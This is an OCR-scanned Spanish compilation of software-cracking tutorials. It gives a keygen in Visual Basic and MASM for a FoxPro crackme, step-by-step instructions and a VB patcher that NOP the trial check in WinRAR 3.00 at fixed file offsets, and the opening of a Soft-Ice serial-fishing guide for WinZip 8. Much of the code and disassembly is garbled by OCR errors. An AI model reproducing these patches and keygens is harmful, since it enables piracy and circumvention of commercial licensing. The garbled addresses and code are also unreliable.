L5NOM=ASC(SUBSTR(crackme.text1.text,11,1))<--pone en la variable L5NOM el valor ascli de la ONCEAVA letra del name introducido en mi caso si es profesor x seria un 
ESPACIO = 32 

L6NOM=ASC(SUBSTR(crackme.text1.text,13,1))<--pone en la variable L6NOM el valor ascli de la TRECEAVA letra del name introducido en mi caso si es profesor x seria un 
ESPACIO = 32 

L7NOM=ASC(SUBSTR(crackme.text1.text,16,1))<--pone en la variable L7NOM el valor ascli de la DIECISEISAVA letra del name introducido en mi caso si es profesor x seria un 


ESPACIO = 32 
L8NOM=ASC(SUBSTR(crackme.text1.text,19,1))<--pone en la variable L8NOM el valor ascli de la DECIMO NOVENA letra del name introducido en mi caso si es profesor x seria 
un ESPACIO = 32 


SERIAL1=(L1NOM+ASC("B"))*(L2NOM+ASC("L"))*(L3NOM+ASC("A"))+(L4NOM+ASC("D"))*(L5NOM+ASC("I"))*(L6NOM+ASC("M"))+(L7NOM+ASC("I"))*(L8NOM+ASC("R")) 


nota: como pueden ver los ascii de la sumatoria hacen el nombre: BLADIMIR será el nombre del programador del crackme? ;p. 
B=66 L=76 A=65 D=68 |=73 M=77 |=73 R=82 


como podemos ver aquí esta clarísimo la segunda parte de la validación del serial, se los explicare rápido para no aburrirlos y que se vayan a ver la 
televisión, o mínimo la película "The matrix reloaded ” bueno arribita la operación es así: 


L1NOM lo suma a el valor en ascii de la letra B, L2NOM lo suma a el valor en ascii de la letra L y así se va todo el camino entienden?, después de sacar 
esos valores, multiplica L1NOM * L2NOM * L3NOM y guarda el valor, después multiplica L4NOM * L5NOM * L6NOM y guarda el valor después multiplica 
L7NOM * L8NOM y guarda el valor y después suma los resultados de las multiplicaciones y listo ese es su serial. 


IF val(crackme.text2.text)= SERIAL1 <-- en esta parte pregunta si es valido 


do form bueno <-- ejecuta el formulario de acertado tu serial 
ELSE 

do form malo 

ENDIF 

ENDPROC 


en si esta entendible no? el serial para mi caso seria: 
name: profesor x 
serial: 7620436 


al insertarlo nos aparecerá una bonita foto: 


lndcdararamo E rardom 1 


y como siempre digo Cr£eO que este arroz Ya se COCO solo faltaría programar el keygen que me da un pelin de flojera pero les voy a 
poner el código fuente del algoritmo como quedaría en Visual BAsic y Ensamblador para todos los gustos hehehe: 


Codificar el kEYGEN! 


CÓDIGO FUENTE PARA VISUAL BASIC 


Private Sub Command1_Click() 
lencadena = Len(Text1l.Text) 
cadena = Textl.Text 

While lencadena < 20 

cadena = cadena +" " 
lencadena = lencadena + 1 
Wend 

11 = Asc(Mid(cadena, 1, 1)) 

12 = Asc(Mid(cadena, 3, 1)) 

13 = Asc(Midí(cadena, 5, 1)) 

14 = Asc(Mid(cadena, 8, 1)) 

15 = Asc(Mid(cadena, 11, 1)) 

16 = Asc(Mid(cadena, 13, 1)) 

17 = Asc(Mid(cadena, 16, 1)) 

18 = Asc(Mid(cadena, 19, 1)) 
Label3.Caption = (11 + Asc("B")) * (12 + Asc("L”)) * (13 + Asc("A”)) + (14 + Asc("D”)) * (15 + Asc("I")) * (16 + Asc("M”)) + (17 + Asc("I")) * (18 + Asc("R")) 
End Sub 


CÓDIGO FUENTE PARA EL ENSAMBLADOR 
EN EL COMPRIMIDO LES INLUYO EL CÓDIGO FUENTE DE EL KEYGEN EN ASM 
aaiaaiaidlalalaiolaslealoalslal*EMPTES Adeaeotaaiaaiotaalalalolalelalalolaalolalolalajolallaololalolatejlalok 
.486 
«model flat, stdcall 
option casemap:none 
include c:imasm32includewindows.inc 
include c:imasm32includetuser32.inc 
include c:iimasm32includeWkernel32.inc 
include c:imasm32includetshell32.inc 
includelib c:imasm32MVibluser32.lib 
includelib c:imasm32MibWernel32.lib 
includelib c:imasm32Mibishell32.lib 
«data 
Minombre db ''Pinche Profe :)'',0 
Nombre db 20 dup(0),0 
_Nombre db 20 dup(0),0 
Espacio db " ",0 
Serial db 12 dup(0),0 
_Serial db 12 dup(0),0 
Icono db "keygen",0 
«data? 
hInstance dd ? 


hIcon dd ? 


const 


IDD_DIALOG EQU 1000 


IDC_NAME EQU 1001 


IDC_SERIAL EQU 1002 


IDC_GEN EQU 1003 


IDC_EXIT EQU 1004 


DigProc PROTO HWND:DWORD, UINT:DWORD, WPARAM:DWORD, LPARAM:DWORD 


Operacion PROTO 


Decimal PROTO 


«code 


start: 


invoke GetModuleHandle, NULL 


mov hInstance,eax 


invoke DialogBoxParam,hInstance,IDD_DIALOG,NULL,addr DlgProc,NULL 


invoke ExitProcess,NULL 


DigProc PROC hDlg:DWORD,uMsg:DWORD,wParam:DWORD,IParam:DWORD 


mov eax, uMsg 


emp eax, WM_INITDIALOG 


jz Iniciar 


emp eax, WM_CLOSE 


jz Cerrar 


emp eax, WM_COMMAND 


jz Ejecutar 


xor eax, eax 


ret 


Iniciar: 


invoke LoadIcon,hInstance,ADDR Icono 


mov hIcon,eax 


invoke SendMessage, hDlg, WM_SETICON,1,hIcon 


invoke SendDlIgltemMessage, hDlg, IDC_NAME, EM_SETLIMITTEXT, 20, 0 


invoke SetDlgltemText, hDlg, IDC_NAME, OFFSET Minombre 


mov eax, TRUE 


ret 


Cerrar: 


invoke PostQuitMessage, 0 


mov eax, TRUE 


ret 


Ejecutar: 


mov eax,wParam 


mov edx,eax 


shr edx,16 


«if dx==BN_CLICKED 


«i£ ax==IDC_EXIT 


invoke PostQuitMessage, 0 


«elseif ax==IDC_GEN 


invoke GetDlgltemText,hDlg,IDC_NAME,ADDR Nombre,20 


invoke Operacion 


invoke SetDlgltemText,hDlg,IDC_SERIAL,ADDR Serial 


invoke SetDlgltemText,hDlg,IDC_NAME,ADDR Nombre 


ret 


.endif 


.endif 


mov eax, TRUE 


ret 


DlgProc endp 


Operacion proc 


pushad 


mov esi, offset Nombre 


mov edi, offset _Nombre 


mov ecx, 20 


rep movsb 


invoke Istrlen, offset _Nombre 


mov ecx, 20 


mov edi, offset _Nombre 


sub ecx, eax 


iniciol: 


jz finall 


mov byte ptr [edi+19], 32 


dec edi 


dec ecx 


jmp iniciol 


finall: 


xor eax, eax 


xor ebx, ebx 


mov edi, offset _Nombre 


mov al, byte ptr [edi] 


add eax, 66 


mov bl, byte ptr [edi+2] 


add ebx, 76 


mul ebx 


mov bl, byte ptr [edi+4] 


add ebx, 65 


mul ebx 


mov esi, eax 


xor eax, eax 


xor ebx, ebx 


mov al, byte ptr [edi+7] 


add eax, 68 


mov bl, byte ptr [edi+10] 


add ebx, 73 


mul ebx 


mov bl, byte ptr [edi+12] 


add ebx, 77 


mul ebx 


add esi, eax 


xor eax, eax 


xor ebx, ebx 


mov al, byte ptr [edi+15] 


add eax, 73 


mov bl, byte ptr [edi+18] 


add ebx, 82 


mul ebx 


add eax, esi 


invoke Decimal 


popad 


mov eax, TRUE 


ret 


Operacion endp 


Decimal proc 


mov esi, offset _Serial 


xor ebx, ebx 


mov ecx, 10 


dividir: 


xor edx, edx 


idiv ecx 


add dl, 30h 


mov byte ptr [esi+ebx], dl 


inc ebx 


inc ebp 


if eax>9 


jmp dividir 


.endif 


add al, 30h 


mov byte ptr [esi+ebx], al 


mov edi, offset Serial 


inc ebx 

Colocar: 

mov al, byte ptr [esi+ebx-1] 
mov byte ptr [edil], al 

inc edi 

dec ebx 

jnz Colocar 

ret 

Decimal endp 

end start 


NOta no 1 


e Para un mejor entendimiento del código de generación del serial, pueden descompilar el crackme.sct siguiendo este método: 


e Abre el REFOX v 8.0 
e Selecciona el file llamado crackme.exe y le das doble click 
e Seleccionas el file llamado crackme.sct después das F3 y nos parece la siguiente ventana: 


nos sale una ventana la cual nos dice el lugar donde se descompilara el file llamado crackme.sct y listo el file descompilado lo podrán manejar mas fácilmente. 


e este tutorial es solo un intento de explicarles lo más básico de como usar el REFOX v 8.0, y creanmelo hay muchos programas hechos en Visual Fox Pro en Internet y para 
la mayoría es el mismo proceso , solo cambia el algoritmo de generación del serial. 
e Soy humano y cometo errores, si encuentras uno házmelo saber OK. 


| Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean muchos tutoriales, practiquen, estudien 
y CRACKEAR será mucho más fácil. 


Gracias a mi amigo Caos Reptante por su ayuda en la Generación del Código en Asembler. 


PRESENTA 


TUTORIAL SOBRE 


WinRAR 3.00 en español 


por 


Tutorial N* 1 


Información 


1. Limitación de Tiempo (40 días), y donde dice "Copia de Evaluacion". 
2. Codificación del Patch! en Visual Basic 6. 


1. W32Dasm v.8.93 
Herramientas: 2. HexWorkShop 


Introducción 


Despues de estar hasta el copete de trabajo.... y nuevamente a darle duro al cracking, con este mi primer tuto. La victima es 
WinRAR 3.00 en español, que tiene un limite de tiempo de 40 dias y los mensajes de "Copia de Evaluacion". Esperando que sea 
de su completa ayuda en este Arte maravilloso de la Ingenieria Inversa. 


Comentario del Programa 


Uno de los mejores compresores - decompresores existentes en el mercado, muy util para empaquetar tamaños grandes de 
informacion. 


ADVERTENCIA : El texto de este artículo esta escrito con fines didácticos, para mostrar simplemente como funciona el sistema, 
por el cúal queda anotado todo lo que compramos. El autor no se hace responsable de cualquier uso ilegal que se le den a estos 
conocimientos. 


Manos a la Obra 


Instalamos el programa y cuando lo cargamos por primera vez nos encontramos 
con algo horrible junto a el nombre de el programa que dice asi "Copia de 
Evaluación”.... es lo que tenemos que modificar para que diga el Titulo del 
Programa osea "Winrar - Winrar”... 


Al Ataque... 


Bueno lo primero que tenemos que hacer es colocar nuestro reloj de la PC un año 
después del actual estamos en el 2002, entonces dejamos el día y la hora igual y 
cambiamos el año a 2003... 


Propiedades de Fecha y hora 


5 “E 2 ME sde 
lWsH 95 76: 12 18:39 
20 21 22 HE 24 25 26 
27:28 29 30: 31 


si te fijas abre tu WinRAR ahora y nos aparece ya una pantalla de que el 
programa expiro y nos pide que nos registremos..... 


le damos Cerrar.... 


el programador ya se tomo la molestia de avisarnos que el programa EXPIRO. 


Regístrese, por favor 


Pues bien tomémonos la molesta de CraCkearlo .... 


Como siempre antes de empezar tenemos que hacer 


una copia de el archivo que vamos a modificar..ya saben con la copia visualizamos 
el código con W32Dasm y al original lo modificamos con el Editor..que en este 
caso va a ser 


el Hex WorkShop... (o el que mas te guste..) 


Usando el W32Dasm 


Bien abrimos Winrar con nuestro precioso W32Dasm y en este caso vamos a 
buscar el texto de .. 


“Please Register” 


si te fijas el primero que nos aparece es este.. 


0d - Col ID0:0066, Control Class:"" Co Text: "60 
002 - Control 10:0065, Control Clas::"” Control Text<"APrice 145t” 
004 - Control16:0067, Control Clazz:"" Control Text:"A51bez ]ist” 

004 - Control10:0001, Control Class:"" Control Text:"Close” 

005 - Control10:0009, Control Class:"” Control Text:"A4Help” 

006- Control Ib:FFFF, Control Clazs:"” Control Text:"" 

007 - ControllD:FFFF, Control Class:*" Control Text:"Please note that WINRAR ls shareware. After a 40 day 


Si te fijas en toda esa parte del programa hay bloques de texto ..y lo que los 
separa es esto: 


Name: DialogID_XXX, + of Controls=XXX, Caption:”” , ClassName:”” 


Bueno donde X son los números o letras con el que cada dialogo se identifica 


Si te fijas esta todo el texto del cuadro de dialogo y nos esta dando el nombre 


numero de el dialogo que viene siendo 
REMINDER 
Entonces busquemos 


REMINDER 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00436808(C) 

:0043680E C605FC5B480001 mov byte ptr [00485BFCI, 01 
:00436B15 6400 push 00000000 

:00436617 68509F4300 push 00439F50 

:00436B1C FF35E4AF4900 push dword ptr [0049AFE4] 
:00436B22 689F604800 push 0048609F 

:00436627 FF35200D4800 push dword ptr [(0048DD201 


* Reference To: USER32.DialogBoxParamA, Ord:0000h 
:0043682D EBSBOABO400 Call 004816£2 


Nos tira aquí ...ahora si te fijas en este pedazo del código tenemos una llamada p 
referencia la dirección ... 


00436B08 
Ya sabes Goto / Goto Code Location 
E introduces la dirección 


y ahora nos va a tirar acá.. 


:004364ADC 833D80D6490000 cmp dword ptr [004906801, 00000000 
:00436AE3 7540 jne 00436B32 

:004364E5 803DFC5B480000 cmp byte ptr [004858FCJ, 00 
:00436AEC 7544 jne 00436B32 

:00436AÉEEÉ 803DF8594A0000 cmp byte ptr [004A59F8], 00 
:00436AF5 7538 jne 00436B32 

:00436AF7 803D1CDD480000 cmp byte ptr [0048DD1CJ, 00 
:00436AFE 7532 jne 00436B32 

:00436800 A184DF4900 mov eax, dword ptr [00490F6B4] 


:00436605 83F828 


:00436B0A 8500 test eax, eax 
:00436B0C 7D24 jge 00436B32 


...eso es un "jg” 
En este caso es jg que significa : 


Jg (0F8F en HexaDecimal) : (Salta si es Mayor) 


que podremos hacer?ii ... 
pues si te fijas donde subraye con rojo 


..Significa que compare EAX con 40 días ..si ya se que ahí no dice 40 ..pero es q 
acuérdate que esta en hexadecimal 


..y 00000028 en Hexadecimal es 40 en decimal... 


Y lo que haremos en si es evitar el salto hacia "Please Register” ..para lo cual recurt 
a Nopear el programa 


(con dos 90 ..y siempre se deben poner los que hagan falta). 
Claro ..vamos a cambiar ese 
7F04 
x un Nopear 
9090 
Así le estamos ordenando que no ejecute ningún dato... 
Y bueno como estamos situados sobre 


:00436B08 7FO4 jg 00436B0E 


Line:98375 Pg 1726 and 1727 of 4532 Code Data (2:00436808 (S0ffset 00035108h in File:Copia de WinRAR.exe 


solo nos resta buscar el OffSet 00036108h en nuestro editor HexWorkShop 
Solo tienes que modificar 7FO4 x 9090 


Y este va a ser nuestro resultado... 


VANRAR - WINRAR (copia de evaluación 


A ES 


| ¡A CArchivos de programox WinRAR y] 


| _ - —- 


| 

Carpeta de archivos  23/07/200... 

UnpSFX.rar 41767 Archivo WinRAR 03/03/199... 
UNRARDLL.rar 33,742 Archivo WinRAR 06/02/199... 

UnrarSrc.rar 28,077 Archivo WinRAR 13/02/1999... 
Copia de WinRAR exe 747,520 Aplicación 14/05/200... 
Default. SFX 50,092 Archivo SFX 14/05/200... 
1364 Archivo ION 29/04/200... 


Veras que ya no nos aparece el Nag screen de limite de tiempo..... 
Y todo parece normal.... 
Ahora... vemos que en la parte superior izquierda nos sale “Copia de Evaluación" 
Pero nosotros queremos que salga.... entonces 


"Evaluation Copy" 


* Possible Reference to String Resource 10=00873: "evaluation cop 


Ahora subimos un poco mas y encontramos un jne.... 


Al cual vamos a modificar por un je.. 


* Possible StringDbata Ref from Data Obj ->”%s - WINRAR” 
:0043F98B 6875664800 push 00486675 


:0043F990 8D442408 lea eax, dword ptr [esp+08] 
:0043F994 50 push eax 

:0043F995 E8667A0300 call 00477400 

:0043F99A 83C40C add esp, 0000000€ 

:0043F99D 80301CDD480000 cmp byte ptr [0048DD1C1, 00 
:0043F9A6 A184DF4900 mov eax, dword ptr [0049DFB4] 
:0043F9AB 83F814 emp eax, 00000014 

:0043F9AE 7005 31 0043F9B5 

:0043F9B0 83F828 cmp eax, 00000028 

:0043F9B3 7C1D 31 0043F9D2 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0043F9AE(C) 
| 


* Possible Reference to String Resource 1ID=00873: "evaluation copy” 


a A A A DA ANA AA ss ADA mn 


Buscamos la dirección offset y nos o sl Hex WorkShop y cambiamos el "75" 
x un 


Line:115896 Pg 2033 and 2034 of 4532 Code Data (2:0043F944 GDifset ODO3EFA4h in File: Copia de WinRAR.exe 


Ya no es de evaluacion y esta parcialmente Crackeado. 
Hasta ahí. ..todo esta bien...pero que sucede si le damos una revisadita al progran 
Les parece si vemos. .?ii 
Opciones / Configuración... 
Nos aparece un cuadro con varias pestañas... me lateria ver 
General 

Ahí en general hay varias opciones...seleccionemos una 

...ahh ya se seleccionemos 
Registro / Registrar los errores en el fichero 


Uppsss...que es esto? 


Como que 
“Available in registered version only” 
No no no... esto no esta totalmente CraCkeado 


y no solo esa opción tiene esa molesta ventana si no que la tienen otras 2 
opciones mas que son: 


comandos /añadir ficheros en el archivo / General / Añadir Verificación de 
autenticidad 


comandos /añadir ficheros en el archivo / Copia de Seguridad / Borrar el 
contenido del disco de destino antes de comprimir 


y es la parte que me interesaria saber como hacer que esas casillas de 
verificación en el programa ejecutado se activen 


y desactiven segun donde hayas activado la casilla. 


Codificar el Patch! 


Private Sub Command2_Click() 


If FileExist(Text5) Then 
On Error GoTo Cancelo 
Dialogo.CancelError = True 
With Dialogo 
Dim Tamaño As Long 
Tamaño = 747520 
If FilelLen(Text5) <> Tamaño Then 
MsgBox "El tamaño del Archivo es diferentel", 16, "Crackcero_ [Rip], The Cracker" 
Else 
Open Text5 For Binary Access Write As +f1 
Put +41, 221449, 4H9090 
Put 441, 257957, 4H7A74 
MsgBox "Parchado Satisfactorialemtel", 64, "Crackcero_ [RiP], The Cracker" 
End If 
End With 
On Error GoTo O 
Exit Sub 


Close +41 
Cancelo: 
Else 

End If 
End Sub 


Solo nos quedaría cambiar el mensaje “COPIA DE PRUEBA DURANTE 40 DÍAS”, que aparece en Ayuda - Acerca de Winrar y 
cambiarlo por "Crackeado por Crackcero_" o por sus nombres...., esto lo hacemos editando el archivo "Winrar.Ing". En 401149b1 


encontramos el mensaje que buscabamos, lo reemplazamos y guardamos los cambios. 


7 Winrar. Ing - Bloc de notas 


5 Dialog ABOUTRARDLG 
a0232580=""120x100"" 
d36c2919="Acerca de WinRAR” 
edcb1e34=""WinRAR”' 
4b2a9c08="Copyright O 1993-%d por" 
2e12ec46="Eugene Roshal” 
5bb74364="Traducido porinJ.Franco" 
Na RUIiEaCrackeado por Crackcero 
a7b1350b="Aceptar"” 


Tambien lo pueden hacer abriendo el ejecutable Winrar.exe con el Reshacker, o el Exescope y modificar esa parte donde decia 
"Copia de prueba durante 40 dias" por la que deseen. 


Esta es mi primera experiencia rompiendo una herramienta como el Sr. WinRAR 


en español..., les agradeceria AVUDARME a crackear esa parte de como hacer 
para activar las 3 casillas de verificación para que quede COMPLETAMENTE 
CRACKEADO. Se podria decir que existen muchas formas de CRACKEAR, creo 
que en esta version utilizan un archivo REG para registrarlo, alquien que me 
ayude a ver esa parte del código, me ayudaria bastante, escribanme 
crackers..... GRACIAS 


Agradecimientos especiales a: Profesor_x, Ricardo Narvaja, Anonimoser, A573r10n, Caos Reptante, Karpoff, Serial_Code9x, 
Sotanez, y a todos los crackers del mundo. 


a] 


e Soy humano y cometo errores, si encuentras uno házmelo saber OK. Crackcero_Clatinmail.com y todos los comentarios 
que creas pertinente, ya que soy un novato. 


Si deseas ponerte en contacto con nosotros puedes hacerlo aquí:Group Tutoriales 2003 - GT2 


e Si deseas aparecer en la compilación envía tu tutorial a: profesor _xGhotmail.com 


INNATO 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean muchos 
tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


5to Curso Soft Ice .. Win Zip 8 


by Mr. SEOTÁ| OgDL£9x= 


Pues bueno ya estuvo bien de fiestas de alcohol y de estarme haciendo guey..ya vamos a 
joderle.... vamos a CraCkear el Win Zip... aun q eso suena muy feo..mejor dicho vamos a 
jugar un rato con el.. =8-P 


Oigan..¡¡¡ D una vez aclaro que yo no enseño ni aprendo CraCking para reventar el software 
y distribuirlo o para que todos los programas que tenga a mi alcancé los desgracie.. 
aprendemos CraCking para evitar abusos y para aprender ... o mejor aun para ayudar a 
alguien...si logran crackear algo y se lo puedan dar a alguien que no tenga los recursos para 
comprar el programa o no tenga los conocimientos...que bien ¿no? ..que podamos ayudar a 
alguien ...siempre y cuando no estemos buscando lucro alguno... 00k? ... lo mejor d esto es 
aprender tener los conocimientos creanme que después les pueden ayudar en algún trabajo 
y no precisamente para crackear algo ... =8-P 


Bueno pues esta vez vamos a obtener el + d Serie valido para el Win Zip $8 .. así que esta vez 
no vamos a cometer delito alguno...por que no vamos a modificar nada...y para eso vamos a 
usar a nuestro precioso amigo... Soft Ice... lo que vamos a hacer es jugar un rato con el 
código vivo.. 


Bien vamos a abrir Win Zip si no lo tienes registrado perfecto...si lo tienes 
registrado..vamos a instalarlo de nuevo...sea cual sea la versión del 8 ... (si no lo tienes lo 


puedes bajar de http://www.winzip.com ) 


Para los que lo tengan registrado...vamos a reinstalarlo... bien al momento de hacer la 
instalación nuevamente...nos va a aparecer esta pantalla 


Thank pou for installing Ihis WinZip upgrade. If you purchased 
S 3 license for a previous versión of WinZip you are entitled to 
” use this uporade at no additional charge 


Registration Information 
Serial CoDe9x 
E759AA 
Press OK. to confirm that this 13 your correct registration information and 


that you have obtained it from WinZip Computing. Ino, or an authorized 
teseller. Otherwise press Change Registration Info or Cancel. 


Change Registration into Cancel | 


Vamos a presionar 
“Change Registration Info” 


Ahora nos aparece esto.. 


Register WinZip Al 


If you paid the WinZip registration fee: 


If you paid the WiriZip registration fee and receied a registration number from WinZip 
Computing or. an authorized reseller, please enter your name and registration number here 
EXACTLY as they appear in the instructions, or click: "Help" for additional information. 


If you have not yet paid the WinZip registration fee: 


lfyou downloaded an evaluation versión ot WinZip, orif you received this version oFWinZip 
¿oa disk or CD, with abook, or gth other hardware or software, and you have not paid the: 
WinZip registration fee, you are licensed to use WinZip for evaluation purposes only. Click. 
"Continue Unregistered”, or click "Help" for additional information. 


Name: E enal CoDe9x 
Registration 4: [E 75391494 


Cancel | Continue Unregistered | Help | 


Ahí le damos en 
“Continue Unregistered” 


y ahora nos sale con esta pantalla 


WinZip 


bh lfyou continue, pour registration informatian will be discarded and this copy ofwWinZip will 
become an evaluation version: 


Do pou want to continue? 


Le vamos a decir que si.. y de ahí seguimos la instalación normal... 
bien yo creo que todos nos hemos dado cuenta que cuando abrimos el Win Zip tiene la 
pinché manía de cambiar los botones de lugar.. 


THE ARCHIVE UTILITY FOR WINDOWS 


THANK YOU FOR TRYING WINZIP! 
This is a fully hunciional urvegittered versión for evaluahon use andy. 
The reguterad versión does nol display the nobice. 


“You can order ha regritered version orime, by phone, or by mad 
Iinramdate onine delivery 1 avadable from www vénzip.com. 


l understand that | may use WinZip only for evaluation 
puposes, subject to he termz of the Evaluation License, and 
that any other use requires payment of the registration fee. 


[ise Jl_ga  ) [oigo] 


O sea que el “I Agree” jamás esta en el mismo lugar ... aparte de que es mega molesto que 
para todo salga esa maldita pantalla ... así que vamos a quitarla...para que no nos este 
jodiendo... 

Bien primero lo revisamos el ejecutable con nuestro language aver que tan protegido esta 
y nos muestra que no hay compresión ni encriptación... ..ook vamos por buen camino... 
vamos a probar ahora con Soft Ice ..abre el Win Zip .....o0k..todo bien no se reinicio... no se 
trabo ni nada...entonces podemos descartar que tenga alguna protección anti sice... 
bien ..ahora vamos a registrarnos en el Win Zip ..introducimos lo que sea 


Register WinZip ES 


If you paid the WinZip registration fee: 


If you paid the WiriZip registrahon fee and recened a registration number from WinZip 
Computing oran authorized reseller, please enter pour name and registration number here 
EXACTLY as they appear in the instructions, or click "Help" for additional information, 


If you have not yet paid the WinZip registration fee: 


lEyou downloaded an evaluation version oFWiriZip, or if you received this version ob WinZip 
on a disk or ED, with abook, or with other hardware or software, and you have not paid he 
WinZip registration fee, you are licensed to use WinZip for evaluation purposes only. Elick. 

"Continue Unregistered", or click "Help" for additional information, 


Name: Mr.Serial CoDe9x 
Registration H — (341256 


Cancel | Continue Unregistered | Help | 


Ook no hay pex.. si recuerdas... t había comentado que al primer cuadro que nos sale 
diciéndonos que es de evaluación y que nos da a escoger entre sus 3 botones cambiantes...;;¡ 
=74(  ... se le llama Nag Screen .. bien podríamos interceptar que llamada hace y quitar esa 

nag screen .. pero la neta nunca lo eh intentado y no se que mas dependa de esa llamada 
aparte de q cada ves que hicieras un Self Extractor aparece un aviso tambien de que es de 
evaluación ,entonces tendríamos que CraCkear cada Self Extractor que hiciéramos (bueno 
si es que alguno d uds hace ) ..Otra opción podría ser que hiciéramos algunos saltos 
modificando el ejecutable... pero aparte de que es más difícil a final de cuentas solo 
simulamos que estamos registrados ... 


Y mejor vamos a obtener un *+d Serie valido y con nuestro nombre.. =8-P ... 
Por eso es que vamos a empezar a CraCkear desde donde nos registramos ..para poder 
interceptar en memoria cuando verifica y fabrica nuestro + d serie valido...que en si la que 


nos importa es la segunda... 


Bien para no tener que estar revisando los break points ...uno x uno ..lo vamos a revisar con 


W32dasm (en este caso por que no tiene Encriptación ni Compresión y de ese modo nos 
permite ver el código) ... 
Lo que queremos es anticiparnos a la ventana que dice 
“Incomplete or incorrect information” 


bien... vamos a aprender algo nuevo hoy.. =8-P.  ... En todos los programas todos los 
cuadros de mensajes que tengan ... son identificados con un ID que los diferencia de todos 
los demás cuadros de dialogo ... en este caso si t fijas todo depende del cuadro de dialogo del 


registro ... y tiene por nombre 
“Register WinZip” 


Entonces vamos a buscar el ID d Register WinZip ya que de ese ID dependen todos los 
demás cuadros de dialogo.. así que vamos a buscar Register WinZip en w32dasm 


je URSON WI2Dasm Ver 8,93 Program Disassembler/D ebugges 


Disassembler Project 
$14 


Debug Sesich Goto Execute Text Eunctiors HeWDatla Bets Help 


Visa 


E mars de ls > 
017 - ControlID:0BCO0, Control Class: "BUTTON" Control Text:"Inc4lude only 1f archive attribute is set” zl 
018 - ControlID:0BC1, Control Class: "BUTTON" Control Text:"Dheset archive attribute” 
019 - ControlID:OBBF, Control Class: *BUTTON”" Control Text:*“ Include siysiem and hidden files" 
020 - ControlID:0001, Control Class: "BUTTON" Control Text:"«Add" 
021 - ConerolID:0002, Control Class: "BUTTON" Control Text: *Cancel” 
022 - ControlID:OBBD, Control Class: *BUTTON" Control Text: *¿Help* 
023 - ControlID:0BC2, Control Class: "BUTTON" Control Text:"*¿Passuvord...” 


001 - ConerollD:FFFF, Control Class: "STATIC" Control Text; "¿Name: ” 
002 -» ControlID:0C80, Control Class: *EDIT" Control Text:** 
003 - ControllD:FFFF, Control Class: "STATIC" Control Text:"¿Registration $:* 


004 - ControllDb:0C81, Control Class: *EDIT" Control Text: ** 
005 - CorrrolIlD:0001, Control Class: "BUTTON" Control Text: "OK" 
006 - ControlID:0002, Control Class: "BUTTON" Control Toext:"Cancel” 
007 - ControllD:0C84, Control Class: *BUTTON" Control Text: "Continue ¿Unregistered" 
008 - ControlID:0C93, Control Class: *BUTTON* Control Text: *¿Help* 
009 - ControlID:2B0D, Control Class: "STATIC" Control Text: *Banner” 
010 - ControlID:0C85, Control Class: *STATIC" Control Text: “Message” 
011 - ControlID:2B0E, Control Class: "STATIC" Control Text: “Banner” 
012 -» ControlID:2BOF, Control Class: *STATIC" Control Text: “Message” 
Name: DialogID_0CX4, $ of Controls*006, Caption: "Winlip", ClassNanme:”*” 
001 - ControlID:OCE9, Control Class: "BUTTON" Control Text:"¿Yes” 
002 - ControlID:0CX3, Control Class: "BUTTON" Control Toxt:*4Ho” 
003 » ControlID:0CE5, Control Class: "BUTTON" Control Text:"«Info...”* 
004 - ControlID:0CXE6, Control Class: "BUTTON" Control Text: *¿Help* 
005 - ControlID:0CEC, Control Class: "BUTTON" Control Text: "Never display this message” 
006 - ControlID:OCEB, Control Class: "STATIC" Control Text: ”” 


HHPIRAAAA FARO IMPORTED FUNCTIONS ++rrrrAA AAA AAA 1 1 


Number of Imported Modules = 


Import Module 001: KEPNEL32.d11 
Import Module 002: ADVADIS2Z.d11 


Ves «a We Ass? a 


PARMA IIABRRAA A 


9 (decimal) 


4 
Aa Pg 14 05502 File Winzp32 exe 


Si t fijas nos da el ID que es.. 
DialogID_0C82 


Bien entonces creo que ya sabemos x donde buscar ... 


escribimos tal cual esta el DialoglID_0C82 en W32Dasm 
y ahora nos aparece esto.. 


a URS OH WI32Dasm Ver 8,93 Program Disassembler/Debugges 


ely |laalall: 


AScltW32D asm Ver 8.33 Program Disassembler/Debupger 


Bien ahora es hora de usar la lógica... vamos a ir bajando poco a poco ... si t fijas hay 
partes que están en azul 


32 URSoft W32Dasm Ver 8.93 Program Disassembler/Debugger Ma ES 
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HET ATA ET 


* Reference To: USERI2. Ger SubMenu, Ord:0142h al 
a 


| 
:00407E69 FF152C0744700 Call dword prr [10047742C] 
:00407E6F 6A00 push 00000000 


* Possible Reference to String Resource ID=00039: "Enter VinZip registration information” 
| 

:00407E71 6A27 push 00000027 

:00407E7?3 50 push «ax 


* Reference To: USER32.DelerteMenu, Ord:0087h 


4 > 
| Line:16560 Pg 331 and 332 of 5502 File'Winzip32.exe ES 


Esos son las llamadas a las que les podríamos poner un Break Point ... y son muy claras en 
la imagen ves como dice Delete Menu ... es sencillo imaginarse que esa acción es para borrar 
..Sigamos buscando aver que encontramos .. 

Si t fijas hay un texto que dice 
“Enter WinZip Registration Information” 
creo que vamos por buen camino ..pero las llamadas siguen siendo para borrar y para 
sacara un submenú ... que la neta ami me dice que nada que ver.. con lo que andamos 
buscando.. 

Seguimos bajando ...y uuppss...que es esto?;; =8-0O 


Program Disassembler/Debugges 


etalv laa le. dell 


Possible StringData Ref from Data 0b3 -»"Wintip 


Pues mi muy jodida opinión se me hace que ahí es la ventana de registro...veamos quien la 
llama ... tiene que estar un poco mas arriba 


32 URSS ON W3I2D arm Ves 8.93 Program Disasrsembies /D ebugoe 


$154 


* Fesrible Deterenos 19 Dialog; DialoglD_0AFO, CONTROL_ID:000N, “Om ¿Local hard drives” 


:00407710€ C€A0B 
100407700 56 


Ditacsembier Proyect Dejuz Gesch Goto Esmcuto Tent 


Euncions HeQua Bot Help 
o 


le 


h 
push 0000000b =— 
push ent 


* Pertible Daference to Dialog: Dialoglb_0C41, CONTROL_TD: 0041, ** 


100407789 €9010C0000 
100407191 £3 


' 
push 00000091 
push ebx 


10040749F FF1528 744700 

: 00407995 £6 

100407796 E9SFFTROF00 
100407798 £6 

100407730 E622 790300 
00407341 0030 704CD 400000 
09407748 59 

1 004077A9 59 

: 00407711 7459 

1004077FAC POIDAICDAB0000 
100407FB3 7450 

1004071B5 YOIDIAFFFF 

3 00407FHA B£C0 


' 

Call dword per [00477428] 
push en: 

call 00477694 

push e.i 

call 00431603 

